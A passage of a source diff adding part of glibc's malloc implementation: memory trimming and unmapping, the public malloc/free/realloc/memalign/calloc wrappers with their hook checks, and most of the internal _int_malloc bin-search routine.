+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - p->prev_size;
+  size_t total_size = p->prev_size + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = p->prev_size;
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert ((p->prev_size == offset));
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && p->size > mp_.mmap_threshold
+          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  (void) mutex_lock (&ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  (void) mutex_unlock (&ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    (void) mutex_unlock (&av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+	if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (victim->size > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
+                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                      while ((unsigned long) size < fwd->size)
+                        {
+                          fwd = fwd->fd_nextsize;
+                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                        }
+
+                      if ((unsigned long) size == (unsigned long) fwd->size)
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin &&
+              (unsigned long) (victim->size) >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin) && victim->size == victim->fd->size)
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
